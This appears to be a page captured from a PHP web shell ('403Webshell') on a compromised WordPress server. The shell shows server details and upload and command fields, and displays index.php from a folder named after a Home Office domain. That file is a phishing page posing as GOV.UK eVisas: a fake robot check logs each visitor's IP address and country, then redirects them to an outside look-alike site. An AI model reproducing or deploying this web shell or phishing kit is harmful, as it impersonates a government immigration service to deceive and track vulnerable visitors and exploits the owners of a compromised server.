403Webshell
Server IP : 159.203.58.96  /  Your IP : 216.73.216.89
Web Server : Apache/2.4.52 (Ubuntu)
System : Linux wordpress 5.15.0-152-generic #162-Ubuntu SMP Wed Jul 23 09:48:42 UTC 2025 x86_64
User : www-data ( 33)
PHP Version : 8.0.30
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/www.points.homeoffice.gov.uk/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/html/www.points.homeoffice.gov.uk/index.php
<?php
session_start();

/* ------------------------------
   BASIC RATE LIMITING
-------------------------------- */
$ip = $_SERVER['REMOTE_ADDR'];
$limitFile = sys_get_temp_dir() . "/rate_" . md5($ip);

if (file_exists($limitFile) && time() - filemtime($limitFile) < 2) {
    http_response_code(429);
    exit;
}
touch($limitFile);

/* ------------------------------
   CSRF TOKEN
-------------------------------- */
if (empty($_SESSION['csrf'])) {
    $_SESSION['csrf'] = bin2hex(random_bytes(16));
}

/* ------------------------------
   UTILITIES
-------------------------------- */
function getUserIP() {
    foreach ([
        'HTTP_CF_CONNECTING_IP',
        'HTTP_X_REAL_IP',
        'HTTP_X_FORWARDED_FOR',
        'REMOTE_ADDR'
    ] as $key) {
        if (!empty($_SERVER[$key])) {
            return explode(',', $_SERVER[$key])[0];
        }
    }
    return 'Unknown';
}

function getCountry($ip) {
    $ch = curl_init("http://ip-api.com/json/{$ip}");
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_TIMEOUT => 2
    ]);
    $response = curl_exec($ch);
    curl_close($ch);

    if ($response) {
        $data = json_decode($response, true);
        return $data['country'] ?? 'Unknown';
    }
    return 'Unknown';
}

/* ------------------------------
   HANDLE POST
-------------------------------- */
if ($_SERVER['REQUEST_METHOD'] === 'POST') {

    if (!isset($_POST['csrf']) || $_POST['csrf'] !== $_SESSION['csrf']) {
        http_response_code(403);
        exit;
    }

    $ip = getUserIP();
    $country = getCountry($ip);
    $time = date('Y-m-d H:i:s');

    $log = "[{$time}] {$ip} | {$country}\n";
    file_put_contents(__DIR__ . "/log.txt", $log, FILE_APPEND | LOCK_EX);

    exit;
}
?>

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Welcome to GOV.UK – Verification</title>
<meta name="viewport" content="width=device-width, initial-scale=1">

<style>
body {
    margin: 0;
    font-family: Arial, sans-serif;
    background: #f8f8f8;
}
.header {
    background: #2b7a3d;
    color: white;
    padding: 15px 20px;
    font-size: 22px;
    font-weight: bold;
}
.container {
    max-width: 600px;
    margin: 40px auto;
    background: white;
    padding: 25px;
    border-radius: 6px;
    box-shadow: 0 0 10px rgba(0,0,0,.1);
}
.checkbox-area {
    display: flex;
    align-items: center;
    cursor: pointer;
    margin-top: 20px;
}
.checkbox {
    width: 22px;
    height: 22px;
    border: 2px solid #555;
    margin-right: 10px;
    position: relative;
}
.checkbox.checked::after {
    content: "✔";
    position: absolute;
    left: 3px;
    top: -2px;
    font-size: 18px;
    color: green;
}
button {
    padding: 10px 18px;
    background: #2b7a3d;
    color: white;
    border: none;
    border-radius: 4px;
    cursor: pointer;
}
.message {
    margin-top: 15px;
}
</style>
</head>

<body>
<div class="header">eVisas: access and use your online immigration status</div>

<div class="container">
    <h2>Human Verification</h2>
    <p>Please confirm you are a real person before continuing.</p>

    <div class="checkbox-area" id="checkArea">
        <div class="checkbox" id="box"></div>
        <span>I am not a robot</span>
    </div>

    <div id="question" style="display:none">
        <p><strong>Is fire hot?</strong></p>
        <button onclick="answer(true)">Yes</button>
        <button onclick="answer(false)">No</button>
        <div class="message" id="msg"></div>
    </div>
</div>

<script>
let sent = false;
const csrf = "<?= $_SESSION['csrf'] ?>";

function sendLog() {
    if (sent) return;
    sent = true;

    fetch("", {
        method: "POST",
        headers: {"Content-Type": "application/x-www-form-urlencoded"},
        body: "csrf=" + csrf
    });
}

document.getElementById("checkArea").onclick = () => {
    document.getElementById("box").classList.add("checked");
    document.getElementById("question").style.display = "block";
    sendLog();
};

function answer(ok) {
    const msg = document.getElementById("msg");
    if (ok) {
        msg.textContent = "Verified. Redirecting…";
        setTimeout(() => {
            window.location.href = "https://lxme.in/gb-points.homeoffice.gov.uk/gui-sms-jsf-home-SMS-003-Home.faces.html";
        }, 2500);
    } else {
        msg.textContent = "Incorrect answer. Try again.";
    }
}
</script>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit